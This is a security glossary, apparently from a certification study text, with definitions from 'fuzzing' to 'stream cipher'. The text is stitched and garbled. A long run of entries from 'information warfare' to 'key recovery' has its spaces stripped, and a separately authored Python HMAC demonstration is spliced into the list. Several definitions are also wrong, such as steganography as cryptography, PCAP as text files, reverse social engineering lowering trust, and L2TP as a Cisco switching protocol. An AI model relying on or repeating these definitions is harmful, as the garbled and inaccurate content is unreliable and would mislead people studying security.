fuzzing: The use of large quantities of data to test an interface against security vulnerabilities. (Also known as fuzz testing.)
Generic Routing Encapsulation (GRE): A tunneling protocol designed to encapsulate a wide variety of network layer packets inside IP tunneling packets.
geo-tagging: The metadata that contains location-specific information that is attached to other data elements.
Globally Unique Identifier (GUID): A unique reference number used as an identifier of an item in a system.
Gnu Privacy Guard (GPG): An application program that follows the OpenPGP standard for encryption.
grey box testing: A form of testing where the tester has limited or partial knowledge of the inner working of a system.
group policy: The mechanism that allows for centralized management and configuration of computers and remote users in a Microsoft Active Directory environment.
group policy object (GPO): Stores the group policy settings in a Microsoft Active Directory environment.
hacker: A person who performs hacking activities.
hacking: The term used by the media to refer to the process of gaining unauthorized access to computer systems and networks. The term has also been used to refer to the process of delving deep into the code and protocols used in computer systems and networks. See also cracking.
hacktivist: A hacker who uses his or her skills for political purposes.
hard disk drive (HDD): A mechanical device used for the storing of digital data in magnetic form.
hardening: The process of strengthening a host’s level of security by performing specific system preparations.
hardware security module (HSM): A physical device used to protect but still allow use of cryptographic keys. It is separate from the host machine.
hash: Form of encryption that creates a digest of the data put into the algorithm. These algorithms are referred to as one-way algorithms because there is no feasible way to decrypt what has been encrypted.
hashed message authentication code (HMAC): The use of a cryptographic hash function and a message authentication code to ensure the integrity and authenticity of a message.
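An added example for the hash and HMAC entries (not code from the glossary or its authors), showing the difference between the two in practice: an unkeyed digest detects accidental corruption but can be recomputed by anyone who changes the message, whereas an HMAC tag over the message cannot be reproduced without the key, so it gives authenticity as well as integrity. The framing (tag appended to the message), the function names and the demo key are the example's own constructions.

```python
import hashlib
import hmac

TAG_LEN = 32  # HMAC-SHA256 produces a 32-byte tag

# Constructed key for the demonstration only; a real key comes from a secrets manager
# or a key-exchange step and is never embedded in source.
DEMO_KEY = b"constructed-demo-key-not-for-real-use"


def plain_digest(message: bytes) -> bytes:
    """Unkeyed hash: detects corruption, but anyone can recompute it for a changed message."""
    return hashlib.sha256(message).digest()


def unkeyed_check(message: bytes, digest: bytes) -> bool:
    """Verification with a plain digest passes for any message whose digest was recomputed."""
    return plain_digest(message) == digest


def seal(key: bytes, message: bytes) -> bytes:
    """Append an HMAC-SHA256 tag so the receiver can check both integrity and origin."""
    tag = hmac.new(key, message, hashlib.sha256).digest()
    return message + tag


def open_sealed(key: bytes, blob: bytes):
    """Split message and tag and verify with a constant-time compare.

    Returns the message on success and None on any failure (truncated blob, altered
    message, or wrong key), so callers cannot accidentally use unverified data.
    """
    if len(blob) < TAG_LEN:
        return None
    message, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return message


if __name__ == "__main__":
    original = b"transfer 100 to account 42"
    altered = b"transfer 900 to account 42"
    # Plain digest: a recomputed digest over the altered message still "verifies".
    print("unkeyed check on altered message:", unkeyed_check(altered, plain_digest(altered)))
    # HMAC: the altered message with the original tag is rejected, and so is a wrong key.
    blob = seal(DEMO_KEY, original)
    print("HMAC check, original:", open_sealed(DEMO_KEY, blob) == original)
    print("HMAC check, altered :", open_sealed(DEMO_KEY, altered + blob[-TAG_LEN:]))
```

The use of hmac.compare_digest rather than == is deliberate: a byte-by-byte early-exit comparison leaks, through timing, how many leading tag bytes were correct.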
hash value: See message digest.
hazard: A hazard is a situation that increases risk.
HDD: See hard disk drive.
heating, ventilation, air conditioning (HVAC): The systems used to heat and cool air in a building or structure.
HIDS: See host-based intrusion detection system.
hierarchical trust model: A trust model that has levels or tiers of an ascending nature.
highly structured threat: A threat that is backed by the time and resources to allow virtually any form of attack.
HIPS: See host-based intrusion prevention system.
honeynet: A network version of a honeypot, or a set of honeypots networked together.
honeypot: A computer system or portion of a network that has been set up to attract potential intruders, in the hope that they will leave the other systems alone. Since there are no legitimate users of this system, any attempt to access it is an indication of unauthorized activity and provides an easy mechanism to spot attacks.
host-based intrusion detection system (HIDS): A system that looks for computer intrusions by monitoring activity on one or more individual PCs or servers.
host-based intrusion prevention system (HIPS): A system that automatically responds to computer intrusions by monitoring activity on one or more individual PCs or servers, with the response being based on a rule set.
host security: Security functionality that is present on a host system.
hotfix: A set of updates designed to fix a specific problem.
hot site: A backup site that is fully configured with equipment and data and is ready to immediately accept transfer of operational processing in the event of failure of the operational system.
HSM: See hardware security module.
hub: A network device used to connect devices at the physical layer of the OSI model.
hybrid trust model: A combination of trust models including mesh, hierarchical, and network.
Hypertext Markup Language (HTML): A protocol used to mark up text for use across HTTP.
Hypertext Transfer Protocol (HTTP): A protocol for transfer of material across the Internet that contains links to additional material.
Hypertext Transfer Protocol over SSL/TLS (HTTPS): A protocol for transfer of material across the Internet that contains links to additional material that is carried over a secure tunnel via SSL or TLS.
ICMP: See Internet Control Message Protocol.
IDEA: See International Data Encryption Algorithm.
identification: The process of determining identity as part of identity management and access control. Usually performed only once, when the user ID is assigned.
IEEE: See Institute for Electrical and Electronics Engineers.
IEEE 802.11: A family of standards that describe network protocols for wireless devices.
IEEE 802.1X: An IEEE standard for performing authentication over networks.
IETF: See Internet Engineering Task Force.
IKE: See Internet Key Exchange.
impact: The result of a vulnerability being exploited by a threat, resulting in a loss.
implicit deny: A philosophy that all actions are prohibited unless specifically authorized.
incident: A situation that is different than normal for a specific circumstance.
incident response: The process of responding to, containing, analyzing, and recovering from a computer-related incident.
incremental backup: A backup model where files that have changed since the last full or incremental backup are backed up.
Indicator of Compromise (IOC): A set of conditions or evidence that indicates a system may have been compromised.
information criticality: An assessment of the value of specific elements of information and the systems that handle it.
information security: Often used synonymously with computer security but places the emphasis on the protection of the information that the system processes and stores, instead of on the hardware and software that constitute the system.
informationwarfareTheuseofinformationsecuritytechniques,bothoffensiveanddefensive,whencombatinganopponent.
InfrastructureasaService(IaaS)Theautomatic,on-demandprovisioningofinfrastructureelements,operatingasaservice;acommonelementofcloudcomputing.
initializationvector(IV)Adatavalueusedtoseedacryptographicalgorithm,providingforameasureofrandomness.
instantmessaging(IM)Atext-basedmethodofcommunicatingovertheInternet.
InstituteforElectricalandElectronicsEngineers(IEEE)Anonprofit,technical,professionalinstituteassociatedwithcomputerresearch,standards,andconferences.
intangibleassetAnassetforwhichamonetaryequivalentisdifficultorimpossibletodetermine.Examplesarebrandrecognitionandgoodwill.
integeroverflowAnerrorconditioncausedbythemismatchbetweenavariableassignedstoragesizeandthesizeofthevaluebeingmanipulated.
integrityPartoftheCIAofsecurity,thesecurityprinciplethatrequiresthatinformationisnotmodifiedexceptbyindividualsauthorizedtodoso.
interconnectionsecurityagreement(ISA)Anagreementbetweenpartiestoestablishproceduresformutualcooperationandcoordination
betweenthemwithrespecttosecurityrequirementsassociatedwiththeirjointproject.
InternationalDataEncryptionAlgorithm(IDEA)Asymmetricencryptionalgorithmusedinavarietyofsystemsforbulkencryptionservices.
InternetAssignedNumbersAuthority(IANA)ThecentralcoordinatorfortheassignmentofuniqueparametervaluesforInternetprotocols.TheIANAischarteredbytheInternetSociety(ISOC)toactastheclearinghousetoassignandcoordinatetheuseofnumerousInternetprotocolparameters.
InternetControlMessageProtocol(ICMP)OneofthecoreprotocolsoftheTCP/IPprotocolsuite,usedforerrorreportingandstatusmessages.
InternetEngineeringTaskForce(IETF)Alargeinternationalcommunityofnetworkdesigners,operators,vendors,andresearchers,opentoanyinterestedindividualconcernedwiththeevolutionoftheInternetarchitectureandthesmoothoperationoftheInternet.TheactualtechnicalworkoftheIETFisdoneinitsworkinggroups,whichareorganizedbytopicintoseveralareas(suchasrouting,transport,andsecurity).Muchoftheworkishandledviamailinglists,withmeetingsheldthreetimesperyear.
InternetKeyExchange(IKE)TheprotocolformerlyknownasISAKMP/Oakley,definedinRFC2409.AhybridprotocolthatusespartoftheOakleyandpartoftheSecureKeyExchangeMechanismforInternet(SKEMI)protocolsuitesinsidetheInternetSecurityAssociationandKeyManagementProtocol(ISAKMP)framework.IKEisusedtoestablishasharedsecuritypolicyandauthenticatedkeysforservicesthatrequirekeys(suchasIPsec).
InternetMessageAccessProtocolVersion4(IMAP4)Oneoftwo
commonInternetstandardprotocolsfore-mailretrieval.
InternetProtocol(IP)ThenetworklayerprotocolusedbytheInternetforroutingpacketsacrossanetwork.
InternetProtocolSecurity(IPsec)AprotocolusedtosecureIPpacketsduringtransmissionacrossanetwork.IPsecoffersauthentication,integrity,andconfidentialityservicesandusesAuthenticationHeaders(AH)andEncapsulatingSecurityPayload(ESP)toaccomplishthisfunctionality.
InternetSecurityAssociationandKeyManagementProtocol(ISAKMP)Aprotocolframeworkthatdefinesthemechanicsofimplementingakeyexchangeprotocolandnegotiationofasecuritypolicy.
Internetserviceprovider(ISP)AtelecommunicationsfirmthatprovidesaccesstotheInternet.
intrusiondetectionsystem(IDS)Asystemtoidentifysuspicious,malicious,orundesirableactivitythatindicatesabreachincomputersecurity.
intrusionpreventionsystem(IPS)Asystemtoidentifysuspicious,malicious,orundesirableactivitythatindicatesabreachincomputersecurityandrespondautomaticallywithoutspecifichumaninteraction.
IPsecSeeInternetProtocolSecurity.
ISASeeinterconnectionsecurityagreement.
ISAKMP/OakleySeeInternetKeyExchange.
jailbreakingTheprocessofbreakingOSsecurityfeaturesdesignedtolimitinteractionswiththeOSitself.Commonlyperformedonmobile
phonestounlockfeaturesorbreaklockstocarriers.
KerberosAnetworkauthenticationprotocoldesignedbyMITforuseinclient/serverenvironments.
keyIncryptography,asequenceofcharactersorbitsusedbyanalgorithmtoencryptordecryptamessage.
keyarchivingTheprocessesandprocedurestomakeasecurebackupofcryptographickeys.
keydistributioncenter(KDC)AportionoftheKerberosauthenticationsystem.
keyescrowTheprocessofplacingacopyofcryptographickeyswithatrustedthirdpartyforbackuppurposes.
keyrecoveryAprocessbywherelostkeyscanberecoveredfromastoredsecret.
keyspace  The entire set of all possible keys for a specific encryption algorithm.
key stretching  A mechanism that takes what would be weak keys and “stretches” them to make the system more secure against brute-force attacks.
Layer 2 Tunneling Protocol (L2TP)  A Cisco switching protocol that operates at the data link layer.
layered security  The arrangement of multiple layers of defense, a form of defense in depth.
LDAP  See Lightweight Directory Access Protocol.
least common mechanism  The principle where protection mechanisms should be shared to the least degree possible among users.
least privilege  A security principle in which a user is provided with the minimum set of rights and privileges that he or she needs to perform required functions. The goal is to limit the potential damage that any user can cause.
Lightweight Directory Access Protocol (LDAP)  An application protocol used to access directory services across a TCP/IP network.
Lightweight Extensible Authentication Protocol (LEAP)  A version of EAP developed by Cisco prior to 802.11i to push 802.1X and WEP adoption.
linear cryptanalysis  The use of linear functions to approximate a cryptographic function as a means of analysis.
load balancer  A network device that distributes computing across multiple computers.
local area network (LAN)  A grouping of computers in a network structure confined to a limited area and using specific protocols, such as Ethernet for OSI Layer 2 traffic addressing.
local registration authority  A Registration Authority (RA) that is part of a local unit or enterprise. It is typically only useful within the enterprise, but in many cases this can be sufficient.
logic bomb  A form of malicious code or software that is triggered by a specific event or condition. See also time bomb.
loop protection  The requirement to prevent bridge loops at the Layer 2 level, which is typically resolved using the Spanning Tree algorithm on switch devices.
Low-Water-Mark policy  An integrity-based information security model derived from the Bell–LaPadula model.
MAC  See mandatory access control or Media Access Control.
MAC filtering  The use of layer 2 MAC addresses to filter traffic to only authorized NIC cards.
malware  A class of software that is designed to cause harm.
mandatory access control (MAC)  An access control mechanism in which the security mechanism controls access to all objects (files), and individual subjects (processes or users) cannot change that access.
man-in-the-middle attack  Any attack that attempts to use a network node as the intermediary between two other nodes. Each of the endpoint nodes thinks it is talking directly to the other, but each is actually talking to the intermediary.
master boot record (MBR)  A strip of data on a hard drive in Windows systems, meant to result in specific initial functions or identification.
maximum transmission unit (MTU)  A measure of the largest payload that a particular protocol can carry in a single packet in a specific instance.
MD5  Message Digest 5, a hashing algorithm and a specific method of producing a message digest.
mean time between failure (MTBF)  The statistically determined period of time between failures of the system.
mean time to failure (MTTF)  The statistically determined time to the next failure.
mean time to repair (MTTR)  A common measure of how long it takes to repair a given failure. This is the average time, and may or may not include the time needed to obtain parts.
Media Access Control (MAC) address  The data link layer address for local network addressing.
memorandum of understanding (MOU)  A document executed between two parties that defines some form of agreement.
message authentication code (MAC)  A short piece of data used to authenticate a message. See hashed message authentication code.
message digest  The result of applying a hash function to data. Sometimes also called a hash value. See hash.
metropolitan area network (MAN)  A collection of networks interconnected in a metropolitan area and usually connected to the Internet.
Microsoft Challenge-Handshake Authentication Protocol (MSCHAP)  A Microsoft-developed variant of the Challenge-Handshake Authentication Protocol (CHAP).
mitigate  Action taken to reduce the likelihood of a threat occurring.
modem  A modulator/demodulator that is designed to connect machines via telephone-based circuits.
Monitoring as a Service (MaaS)  The use of a third party to provide security monitoring services.
MSCHAP  See Microsoft Challenge-Handshake Authentication Protocol.
MTBF  See mean time between failure.
MTTF  See mean time to failure.
MTTR  See mean time to repair.
multiple encryption  The use of multiple layers of encryption to improve encryption strength.
multiple-factor authentication  The use of more than one factor as proof in the authentication process.
Multipurpose Internet Mail Extensions (MIME)  A standard that describes how to encode and attach non-textual elements in an e-mail.
NAC  See network access control or Network Admission Control.
NAP  See Network Access Protection.
NAT  See Network Address Translation.
National Institute of Standards and Technology (NIST)  A U.S. government agency responsible for standards and technology.
NDA  See non-disclosure agreement.
near field communication (NFC)  A set of standards and protocols for establishing a communication link over very short distances. Used in mobile devices.
network access control (NAC)  An approach to endpoint security that involves monitoring and remediating endpoint security issues before allowing an object to connect to a network.
Network Access Protection (NAP)  A Microsoft approach to network access control.
Network Address Translation (NAT)  A method of readdressing packets in a network at a gateway point to enable the use of local nonroutable IP addresses over a public network such as the Internet.
Network Admission Control (NAC)  The Cisco technology approach for generic network access control.
Network Attached Storage (NAS)  The connection of storage to a system via a network connection.
network-based intrusion detection system (NIDS)  A system for examining network traffic to identify suspicious, malicious, or undesirable behavior.
network-based intrusion prevention system (NIPS)  A system that examines network traffic and automatically responds to computer intrusions.
Network Basic Input/Output System (NetBIOS)  A system that provides communication services across a local area network.
network forensics  The application of digital forensics processes to network traffic.
network interface card (NIC)  A piece of hardware designed to connect machines at the physical layer of the OSI model.
network operating system (NOS)  An operating system that includes additional functions and capabilities to assist in connecting computers and devices, such as printers, to a local area network.
network operations center (NOC)  A control point from where network performance can be monitored and managed.
network segmentation  The separation of a network into separate addressable segments to limit network traffic traversal to areas of limited scope.
network tap  A connection to a network that allows sampling, duplication, and collection of traffic.
Network Time Protocol (NTP)  A protocol for the transmission of time synchronization packets over a network.
network vulnerability scanner  The application of vulnerability scanning to network devices to search for vulnerabilities at the network level.
New Technology File System (NTFS)  A proprietary file system developed by Microsoft, introduced in 1993, that supports a wide variety of file operations on servers, PCs, and media.
New Technology LANMAN (NTLM)  A deprecated security suite from Microsoft that provides authentication, integrity, and confidentiality for users. Because it does not support current cryptographic methods, it is no longer recommended for use.
next-generation firewall  Firewall technology based on packet contents as opposed to simple address and port information.
NFC  See near field communication.
NIC  See network interface card.
NIST  See National Institute of Standards and Technology.
non-disclosure agreement (NDA)  A legal contract between parties detailing the restrictions and requirements borne by each party with respect to confidentiality issues pertaining to information to be shared.
nonrepudiation  The ability to verify that an operation has been performed by a particular person or account. This is a system property that prevents the parties to a transaction from subsequently denying involvement in the transaction.
null session  The way in which Microsoft Windows represents an unauthenticated connection.
Oakley protocol  A key exchange protocol that defines how to acquire authenticated keying material based on the Diffie-Hellman key exchange algorithm.
object reuse  Assignment of a previously used medium to a subject. The security implication is that before it is provided to the subject, any data present from a previous user must be cleared.
one-time pad  An unbreakable encryption scheme in which a series of nonrepeating, random bits is used once as a key to encrypt a message. Since each pad is used only once, no pattern can be established and traditional cryptanalysis techniques are not effective.
Online Certificate Status Protocol (OCSP)  A protocol used to request the revocation status of a digital certificate. This is an alternative to certificate revocation lists.
open design  The principle that protection mechanisms should not depend upon secrecy of design for security.
open relay  A mail server that receives and forwards mail from outside sources.
Open Vulnerability and Assessment Language (OVAL)  An XML-based standard for the communication of security information between tools and services.
operating system (OS)  The basic software that handles input, output, display, memory management, and all the other highly detailed tasks required to support the user environment and associated applications.
operational model of computer security  Structuring activities into prevention, detection, and response.
opt in  The primary privacy standard in the EU, where a party must opt in to sharing; otherwise, the default option is not to share the information or give permission for other use.
opt out  The primary privacy standard in the US, where a party must opt out of sharing; otherwise, the default option is to share the information and give permission for other use.
Orange Book  The name commonly used to refer to the now outdated Department of Defense Trusted Computer Security Evaluation Criteria (TCSEC).
OVAL  See Open Vulnerability and Assessment Language.
P2P  See peer-to-peer.
PAC  See Proxy Auto Configuration.
Packet Capture (PCAP)  The methods and files associated with the capture of network traffic, in the form of text files.
PAM  See Pluggable Authentication Modules.
pan-tilt-zoom (PTZ)  A term used to describe a video camera that supports remote directional and zoom control.
PAP  See Password Authentication Protocol.
password  A string of characters used to prove an individual’s identity to a system or object. Used in conjunction with a user ID, it is the most common method of authentication. The password should be kept secret by the individual who owns it.
Password Authentication Protocol (PAP)  A simple protocol used to authenticate a user to a network access server.
Password-Based Key Derivation Function 2 (PBKDF2)  A key derivation function that is part of the RSA Laboratories Public Key Cryptography Standards, published as IETF RFC 2898.
patch  A replacement set of code designed to correct problems or vulnerabilities in existing software.
PBX  See private branch exchange.
peer-to-peer (P2P)  A network connection methodology involving direct connection from peer to peer.
peer-to-peer trust model  A trust model built upon actual peer-to-peer connection and communication to establish trust.
penetration testing  A security test in which an attempt is made to circumvent security controls in order to discover vulnerabilities and weaknesses. Also called a pen test.
permissions  Authorized actions a subject can perform on an object. See also access controls.
personal electronic device (PED)  A term used to describe an electronic device, owned by the user and brought into the enterprise, that uses enterprise data. This includes laptops, tablets, and mobile phones, to name a few.
Personal Identity Verification (PIV)  Policies, procedures, hardware, and software used to securely identify federal workers.
personally identifiable information (PII)  Information that can be used to identify a single person.
pharming  The use of a fake website to socially engineer someone out of credentials.
phishing  The use of social engineering to trick a user into responding to something such as an e-mail to instantiate a malware-based attack.
phreaking  Used in the media to refer to the hacking of computer systems and networks associated with the phone company. See also cracking.
physical security  The policies, procedures, and actions taken to regulate actual physical access to and the environment of computing equipment.
PID  See process identifier.
piggybacking  A social engineering technique that involves following a credentialed person through a checkpoint to prevent having to present credentials—i.e., following someone through a door you need a badge to open, effectively using their badge for entry.
PII  See personally identifiable information.
ping sweep  The use of a series of ICMP ping messages to map out a network.
Plain Old Telephone Service (POTS)  The term used to describe the old analog phone service and later the “landline” digital phone service.
plaintext  In cryptography, a piece of data that is not encrypted. It can also mean the data input into an encryption algorithm that would output ciphertext.
Platform as a Service (PaaS)  The concept of having provisionable operational platforms that can be obtained via a service.
Pluggable Authentication Modules (PAM)  A mechanism used in Linux systems to integrate low-level authentication methods into an API.
Point-to-Point Protocol (PPP)  The Internet standard for transmission of IP packets over a serial line, as in a dial-up connection to an ISP.
Point-to-Point Protocol Extensible Authentication Protocol (PPP EAP)  A standard method for transporting multi-protocol datagrams over point-to-point links.
Point-to-Point Protocol Password Authentication Protocol (PPP PAP)  PAP is a PPP extension that provides support for password authentication methods over PPP.
Point-to-Point Tunneling Protocol (PPTP)  The use of generic routing encapsulation over PPP to create a methodology used for virtual private networking.
Port Address Translation (PAT)  The manipulation of port information in an IP datagram at a point in the network to map ports in a fashion similar to Network Address Translation’s change of network address.
port scan  The examination of TCP and UDP ports to determine which are open and what services are running.
pre-shared key (PSK)  A shared secret that has been previously shared between parties and is used to establish a secure channel.
Pretty Good Privacy (PGP)  A popular encryption program that has the ability to encrypt and digitally sign e-mail and files.
preventative intrusion detection  A system that detects hostile actions or network activity and prevents them from impacting information systems.
privacy  Protecting an individual’s personal information from those not authorized to see it.
privacy-enhancing technology  Cryptographic protection mechanisms employed to ensure privacy of information.
privacy impact assessment (PIA)  The process and procedure of determining the privacy impact and subsequent risk of data elements and their use in the enterprise.
private branch exchange (PBX)  A telephone exchange that serves a specific business or entity.
privilege auditing  The process of checking the rights and privileges assigned to a specific account or group of accounts.
privilege management  The process of restricting a user’s ability to interact with the computer system.
process identifier (PID)  A unique identifier for a process thread in the operating system kernel.
Protected Extensible Authentication Protocol (PEAP)  A protected version of EAP developed by Cisco, Microsoft, and RSA Security that functions by encapsulating the EAP frames in a TLS tunnel.
Protected Health Information (PHI)  Information that can disclose health-related items for an individual that must be protected in the system. Similar to PII but health related in nature.
protocol analyzer  A tool used by network personnel to identify packets and header information during network transit. The primary use is in troubleshooting network communication issues.
Proxy Auto Configuration (PAC)  A method of automating the connection of web browsers to appropriate proxy services to retrieve a specific URL.
proxy server  A server that acts as a proxy for individual requests and is used for performance and security purposes in a scalable fashion.
PSK  See pre-shared key.
psychological acceptability  The principle that protection mechanisms should not impact users, or if they do, the impact should be minimal.
PTZ  See pan-tilt-zoom.
public key cryptography  See asymmetric encryption.
public key infrastructure (PKI)  Infrastructure for binding a public key to a known user through a trusted intermediary, typically a certificate authority.
qualitative risk assessment  The process of subjectively determining the impact of an event that affects a project, program, or business. It involves the use of expert judgment, experience, or group consensus to complete the assessment.
quantitative risk assessment  The process of objectively determining the impact of an event that affects a project, program, or business. It usually involves the use of metrics and models to complete the assessment.
RADIUS  Remote Authentication Dial-In User Service, a standard protocol for providing authentication services. It is commonly used in dial-up, wireless, and PPP environments.
RAID  See Redundant Array of Independent Disks.
ransomware  Malware that encrypts sensitive files and offers their return for a ransom.
rapid application development (RAD)  A software development methodology that favors the use of rapid prototypes and changes as opposed to extensive advanced planning.
RAS  See Remote Access Service/Server.
RBAC  See rule-based access control or role-based access control.
RC4 stream cipher  A stream cipher used in TLS and WEP.
Real-time Blackhole List (RBL)  A system that uses DNS information to detect and dump spam e-mails.
Real-time Transport Protocol (RTP)  A protocol for a standardized packet format used to carry audio and video traffic over IP networks.
Recovery Agent (RA)  In Microsoft Windows environments, the entity authorized by the system to use a public key recovery certificate to decrypt other users’ files using a special private key function associated with the Encrypting File System (EFS).
recovery point objective (RPO)  The amount of data that a business is willing to place at risk. It is determined by the amount of time a business has to restore a process before an unacceptable amount of data loss results from a disruption.
recovery time objective (RTO)  The amount of time a business has to restore a process before unacceptable outcomes result from a disruption.
Redundant Array of Independent Disks (RAID)  The use of an array of disks arranged in a single unit of storage for increasing storage capacity, redundancy, and performance characteristics. Formerly known as Redundant Array of Inexpensive Disks.
reference monitor  A non-bypassable element of the kernel that processes and enforces all security interactions, including subject-object accesses.
registration authority (RA)  The party in the PKI process that establishes identity for the Certificate Authority to issue a certificate.
Remote Access Server/Service (RAS)  A combination of hardware and software used to enable remote access to a network.
Remote Access Trojan (RAT)  A form of malware designed to enable remote access to a system by an unauthorized party.
replay attack  An attack where data is replayed through a system to reproduce a series of transactions.
repudiation  The act of denying that a message was either sent or received.
reverse social engineering  A social engineering attack pattern where the attacker prepositions themselves to be the person you call when you think you are attacked. Because you call them, your level of trust is lower.
residual risk  Risks remaining after an iteration of risk management.
Ring policy  Part of the Biba security model, a policy that allows any subject to read any object without regard to the object’s level of integrity and without lowering the subject’s integrity level.
RIPEMD  A hash function developed in Belgium. The acronym expands to RACE Integrity Primitives Evaluation Message Digest, but this name is rarely used. The current version is RIPEMD-160.
risk  The possibility of suffering a loss.
risk assessment or risk analysis  The process of analyzing an environment to identify the threats, vulnerabilities, and mitigating actions to determine (either quantitatively or qualitatively) the impact of an event affecting a project, program, or business.
risk management  Overall decision-making process of identifying threats and vulnerabilities and their potential impacts, determining the costs to mitigate such events, and deciding what actions are cost effective to take to control these risks.
Rivest, Shamir, Adleman (RSA)  The names of the three men who developed a public key cryptographic system and the company they founded to commercialize the system.
rogue access point  An unauthorized access point inserted into a network allowing unauthorized wireless access.
role-based access control (RBAC)  An access control mechanism in which, instead of the users being assigned specific access permissions for the objects associated with the computer system or network, a set of roles that the user may perform is assigned to each user.
rootkit  A form of malware that modifies the OS in a system to change the behavior of the system.
router  A network device that operates at the network layer of the OSI model.
RTP  See Real-time Transport Protocol.
rule-based access control (RBAC)  An access control mechanism based on rules.
run levels  In UNIX and Linux systems, run levels indicate the type of state the system is in, from 0 (halted) to 6 (rebooting). Lower run levels indicate maintenance conditions with fewer services running; higher run levels are normal operating conditions. Each UNIX variant employs the concept in the same manner, but the specifics for each run level can differ.
safeguard  See control.
Safe Harbor  A series of provisions to manage the different privacy policies between the US and EU when it comes to data sharing.
SAN  See storage area network.
sandboxing  The concept of isolating a system and specific processes from the OS in order to provide specific levels of security.
SCADA  See supervisory control and data acquisition.
SCEP  See Simple Certificate Enrollment Protocol.
script kiddie  A hacker with little true technical skill and hence who uses only scripts that someone else developed.
Secure Copy Protocol (SCP)  A network protocol that supports secure file transfers.
Secure Development Lifecycle (SDL) model  A process model to include security function consideration as part of the build process of software in an effort to reduce attack surfaces and vulnerabilities.
Secure FTP  A method of secure file transfer that involves the tunneling of FTP through an SSH connection. This is different from SFTP. See Secure Shell File Transfer Protocol.
Secure Hash Algorithm (SHA)  A hash algorithm used to hash block data. The first version is SHA1, with subsequent versions detailing hash digest length: SHA256, SHA384, and SHA512.
Secure Hypertext Transfer Protocol (SHTTP)  An alternative to HTTPS, in which only the transmitted pages and POST fields are encrypted. Rendered moot, by and large, by widespread adoption of HTTPS.
Secure Key Exchange Mechanism for Internet (SKEMI)  A protocol and standard for the key exchange across the Internet.
Secure/Multipurpose Internet Mail Extensions (S/MIME)  An encrypted implementation of the MIME (Multipurpose Internet Mail Extensions) protocol specification.
Secure Shell (SSH)  A set of protocols for establishing a secure remote connection to a computer. This protocol requires a client on each end of the connection and can use a variety of encryption protocols.
Secure Shell File Transfer Protocol (SFTP)  A secure file transfer subsystem associated with the Secure Shell (SSH) protocol.
Secure Sockets Layer (SSL)  An encrypting layer between the session and transport layers of the OSI model designed to encrypt above the transport layer, enabling secure sessions between hosts.
Security Assertion Markup Language (SAML)  An XML-based standard for exchanging authentication and authorization data.
security association (SA)  An instance of security policy and keying material applied to a specific data flow. Both IKE and IPsec use SAs, although these SAs are independent of one another. IPsec SAs are unidirectional and are unique in each security protocol, whereas IKE SAs are bidirectional. A set of SAs is needed for a protected data pipe, one SA per direction per protocol. SAs are uniquely identified by destination (IPsec endpoint) address, security protocol (AH or ESP), and security parameter index (SPI).
security baseline  The end result of the process of establishing an information system’s security state. It is a known good configuration resistant to attacks and information theft.
Security Content Automation Protocol (SCAP)  A method of using specific protocols and data exchanges to automate the determination of vulnerability management, measurement, and policy compliance across a system or set of systems.
security controls  A group of technical, management, or operational policies and procedures designed to implement specific security functionality. Access controls are an example of a security control.
security information event management (SIEM)  The name used for a broad range of technological solutions to the collection and analysis of security-related information across the enterprise.
security kernel  See reference monitor.
security through obscurity  An approach to security using the mechanism of hiding information to protect it.
separation (or segregation) of duties  A basic control that prevents or detects errors and irregularities by assigning responsibilities to different individuals so that no single individual can commit fraudulent or malicious actions.
Sender Policy Framework (SPF)  An e-mail verification system designed to detect spoofed e-mail addresses.
sequence number  A number within a TCP packet to maintain TCP connections and conversation integrity.
server-side scripting  The processing of scripts on the server side of an Internet connection to prevent client tampering with the process.
service level agreement (SLA)  An agreement between parties concerning the expected or contracted uptime associated with a system.
service set identifier (SSID)  Identifies a specific 802.11 wireless network. It transmits information about the access point to which the wireless client is connecting.
shadow file  The file that stores the encrypted password in a system.
shielded twisted-pair (STP)  A physical network connection consisting of two wires twisted and covered with a shield to prevent interference.
shift cipher  A cipher that operates by substitution, the replacement of one character for another.
Short Message Service (SMS)  A form of text messaging over phone and mobile phone circuits that allows up to 160-character messages to be carried over signaling channels.
shoulder surfing  A technique from social engineering where you observe another’s action, such as a password entry.
signature database  A collection of activity patterns that have already been identified and categorized and that typically indicate suspicious or malicious activity.
Simple Certificate Enrollment Protocol (SCEP)  A protocol used in public key infrastructure (PKI) for enrollment and other services.
Simple Mail Transfer Protocol (SMTP)  The standard Internet protocol used to transfer e-mail between hosts.
Simple Network Management Protocol (SNMP)  A standard protocol used to manage network devices across a network remotely.
Simple Object Access Protocol (SOAP)  An XML-based specification for exchanging information associated with web services.
Simple Security Rule  The principle that states complexity makes security more difficult and hence values simplicity.
single loss expectancy (SLE)  Monetary loss or impact of each occurrence of a threat. SLE = asset value × exposure factor.
single sign-on (SSO)  An authentication process by which the user can enter a single user ID and password and then move from application to application or resource to resource without having to supply further authentication information.
slack space  Unused space on a disk drive created when a file is smaller than the allocated unit of storage (such as a sector).
smart cards  A token with a chip to store cryptographic tokens. Because of the nature of smart cards, they are nearly impossible to copy or counterfeit.
SMS  See Short Message Service.
smurf attack  A method of generating significant numbers of packets for a DoS attack.
sniffer  A software or hardware device used to observe network traffic as it passes through a network on a shared broadcast media.
sniffing  The use of a software or hardware device (sniffer) to observe network traffic as it passes through a network on a shared broadcast media.
social engineering  The art of deceiving another person so that he or she reveals confidential information. This is often accomplished by posing as an individual who should be entitled to have access to the information.
Software as a Service (SaaS)  The provisioning of software as a service, commonly known as on-demand software.
software development lifecycle model (SDLC)  The processes and procedures employed to develop software. Sometimes also called secure development lifecycle model when security is part of the development process.
solid-state drive (SSD)  A mass storage device, such as a hard drive, that is composed of electronic memory as opposed to a physical device of spinning platters.
SONET  See Synchronous Optical Network Technologies.
spam  E-mail that is not requested by the recipient and is typically of a commercial nature. Also known as unsolicited commercial e-mail (UCE).
spam filter  A security appliance designed to remove spam at the network layer before it enters e-mail servers.
spear phishing  A form of targeted phishing where specific information is included to convince the recipient that the communication is genuine.
spim  Spam sent over an instant messaging channel.
spoofing  Making data appear to have originated from another source so as to hide the true origin from the recipient.
spyware  Malware designed to spy on a user, typically recording information such as keystrokes for passwords.
SQL injection  An attack against a SQL engine parser designed to perform unauthorized database activities.
SSD  See solid-state drive.
SSL stripping attack  A specific type of man-in-the-middle attack against SSL.
steganography  The use of cryptography to hide communications.
storage area network (SAN)  A technology-based storage solution consisting of network attached storage.
STP  See shielded twisted-pair.
stream cipher  An encryption process used against a stream of information, even bit by bit, as opposed to operations performed on blocks.
